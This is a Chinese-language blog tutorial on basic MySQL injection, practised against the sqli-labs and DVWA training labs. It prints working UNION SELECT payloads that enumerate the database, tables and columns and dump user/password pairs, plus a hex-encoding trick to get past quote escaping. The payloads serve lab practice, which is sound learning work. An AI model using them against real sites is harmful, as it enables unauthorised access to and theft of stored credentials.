首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
超详细教你怎么升级Mysql的版本
May 19 MySQL
详解MySQL中的主键与事务
May 27 MySQL
MySQL快速插入一亿测试数据
Jun 23 MySQL
MySql 缓存查询原理与缓存监控和索引监控介绍
Jul 02 MySQL
使用ORM新增数据在Mysql中的操作步骤
Jul 26 MySQL
MySQL8.0的WITH查询详情
Aug 30 MySQL
防止web项目中的SQL注入
Dec 06 MySQL
MySQL中一条SQL查询语句是如何执行的
Apr 08 MySQL
MySQL分区以及建索引的方法总结
Apr 13 MySQL
Mysql中常用的join连接方式
May 11 MySQL
面试官问我Mysql的存储引擎了解多少
Aug 05 MySQL
前端传参数进行Mybatis调用mysql存储过程执行返回值详解
Aug 14 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
pycryto(1) shell脚本(1) 数据加密(1) 曝光融合(1) kafka(2) 连接器(1) 公共键(1) 高动态范围(1) HDR(1) key(1)
You might like
一道关于php变量引用的面试题
2010/08/08 PHP
wordpress自定义url参数实现路由功能的代码示例
2013/11/28 PHP
PHP实现无限分类的实现方法
2016/11/14 PHP
php自定义函数实现统计中文字符串长度的方法小结
2017/04/15 PHP
Docker 安装 PHP并与Nginx的部署实例讲解
2021/02/27 PHP
JQuery 学习笔记 选择器之五
2009/07/23 Javascript
jQuery Flash/MP3/Video多媒体插件
2010/01/18 Javascript
JS Excel读取和写入操作(模板操作)实现代码
2010/04/11 Javascript
关于javascript中this关键字(翻译+自我理解)
2010/10/20 Javascript
非常好用的JsonToString 方法 简单实例
2013/07/18 Javascript
jquery选择器-根据多个属性选择示例代码
2013/10/21 Javascript
JavaScript实现检查页面上的广告是否被AdBlock屏蔽了的方法
2014/11/03 Javascript
微信支付如何实现内置浏览器的H5页面支付
2015/09/25 Javascript
JavaScript第一篇之实现按钮全选、功能
2016/08/21 Javascript
el-input 标签中密码的显示和隐藏功能的实例代码
2019/07/19 Javascript
vue柱状进度条图像的完美实现方案
2019/08/26 Javascript
这15个Vue指令,让你的项目开发爽到爆
2019/10/11 Javascript
详解Python中的from..import绝对导入语句
2016/06/21 Python
Django forms组件的使用教程
2018/10/08 Python
Python如何实现转换URL详解
2019/07/02 Python
python实现键盘输入的实操方法
2019/07/16 Python
Python中*args和**kwargs的区别详解
2019/09/17 Python
Python模块future用法原理详解
2020/01/20 Python
jupyter notebook 参数传递给shell命令行实例
2020/04/10 Python
基于Python实现粒子滤波效果
2020/12/01 Python
世界顶级户外运动品牌折扣网站:LeftLane Sports
2019/06/12 全球购物
英国马莎百货印度官网:Marks & Spencer印度
2020/10/08 全球购物
采用怎样的方法保证数据的完整性
2013/12/02 面试题
酒店端午节促销方案
2014/02/18 职场文书
培训协议书范本
2014/04/22 职场文书
英语课外活动总结
2014/08/27 职场文书
中考学习决心书
2015/02/04 职场文书
2015驻村干部工作总结
2015/04/07 职场文书
2015年高一班主任工作总结
2015/05/13 职场文书
大学校园餐饮创业计划书
2019/08/07 职场文书
mysql 如何获取两个集合的交集/差集/并集
2021/06/08 MySQL